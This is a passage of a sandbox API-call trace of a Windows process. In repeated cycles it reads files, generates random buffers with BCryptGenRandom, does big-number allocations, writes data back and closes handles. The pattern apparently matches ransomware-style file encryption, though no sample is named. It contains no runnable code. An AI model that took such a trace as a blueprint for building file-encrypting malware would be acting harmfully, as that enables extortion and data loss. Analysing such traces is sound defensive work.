lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.422] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1290, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.423] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.434] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x16fc, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.434] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.435] CloseHandle (hObject=0x170) returned 1 [0153.435] free (_Block=0x3df0008) [0153.435] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.447] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.449] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.449] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0153.449] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.450] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.450] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0153.450] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.450] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.450] free (_Block=0x3e305b8) [0153.450] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.450] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.451] free (_Block=0x1fa91d0) [0153.451] free (_Block=0x1fa2ed8) [0153.451] free (_Block=0x1fa90b8) [0153.451] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.451] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.452] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x12a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.452] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.464] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1464, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.465] CloseHandle (hObject=0x170) returned 1 [0153.465] free (_Block=0x3df0008) [0153.465] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.474] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.474] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.474] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0153.474] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.475] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.475] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0153.475] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.475] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.475] free (_Block=0x3e305b8) [0153.475] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.475] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.476] free (_Block=0x1fa91d0) [0153.476] free (_Block=0x1fa2ed8) [0153.476] free (_Block=0x1fa90b8) [0153.476] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.476] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.477] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x8430, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.478] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.479] CloseHandle (hObject=0x170) returned 1 [0153.479] free (_Block=0x3df0008) [0153.479] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.489] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.489] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.489] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0153.489] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.490] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.490] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0153.490] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.490] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.490] free (_Block=0x3e305b8) [0153.490] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.490] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.491] free (_Block=0x1fa91d0) [0153.491] free (_Block=0x1fa2ed8) [0153.491] free (_Block=0x1fa90b8) [0153.491] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.491] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.492] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1320, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.492] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.503] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1418, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.504] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.505] CloseHandle (hObject=0x170) returned 1 [0153.505] free (_Block=0x3df0008) [0153.505] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.513] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.514] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.514] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0153.514] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.514] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.515] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0153.515] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.515] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.515] free (_Block=0x3e305b8) [0153.515] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.515] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.515] free (_Block=0x1fa91d0) [0153.515] free (_Block=0x1fa2ed8) [0153.515] free (_Block=0x1fa90b8) [0153.516] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.516] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.517] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x19a0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.517] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.529] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1c40, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.529] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.530] CloseHandle (hObject=0x170) returned 1 [0153.530] free (_Block=0x3df0008) [0153.530] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.540] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.541] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.541] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0153.541] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.541] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.551] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0153.552] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.552] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.552] free (_Block=0x3e305b8) [0153.552] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.552] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.552] free (_Block=0x1fa91d0) [0153.552] free (_Block=0x1fa2ed8) [0153.552] free (_Block=0x1fa90b8) [0153.552] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.553] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.554] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1bd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.566] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1348, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.567] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.568] CloseHandle (hObject=0x170) returned 1 [0153.568] free (_Block=0x3df0008) [0153.568] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.577] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.577] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.577] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0153.577] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.578] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.578] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0153.578] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.578] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.578] free (_Block=0x3e305b8) [0153.578] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.578] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.579] free (_Block=0x1fa91d0) [0153.579] free (_Block=0x1fa2ed8) [0153.579] free (_Block=0x1fa90b8) [0153.579] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.579] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.580] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1720, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.581] CloseHandle (hObject=0x170) returned 1 [0153.581] free (_Block=0x3df0008) [0153.581] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.593] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.593] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.593] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0153.593] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.594] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.594] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0153.594] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.594] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.594] free (_Block=0x3e305b8) [0153.594] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.594] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.595] free (_Block=0x1fa91d0) [0153.595] free (_Block=0x1fa2ed8) [0153.595] free (_Block=0x1fa90b8) [0153.595] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.595] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.596] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1550, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.596] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.745] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x13e8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0153.765] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.774] CloseHandle (hObject=0x170) returned 1 [0153.774] free (_Block=0x3df0008) [0153.774] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.781] ReadFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToRead=0xcd8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 0x0 [0153.781] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.791] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.792] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.792] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0153.792] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.793] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.793] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0153.793] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.793] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.793] free (_Block=0x3e305b8) [0153.793] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.793] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.794] free (_Block=0x1fa91d0) [0153.794] free (_Block=0x1fa2ed8) [0153.794] free (_Block=0x1fa90b8) [0153.794] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0153.794] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.805] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.806] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.806] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0153.806] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.807] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.807] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0153.807] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0153.807] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0153.807] free (_Block=0x3e305b8) [0153.807] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0153.807] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0153.808] free (_Block=0x1fa91d0) [0153.808] free (_Block=0x1fa2ed8) [0153.808] free (_Block=0x1fa90b8) [0153.808] WriteFile (in: hFile=0xec, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x610, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0153.808] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0153.811] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.812] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0153.812] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0153.812] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0153.812] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, 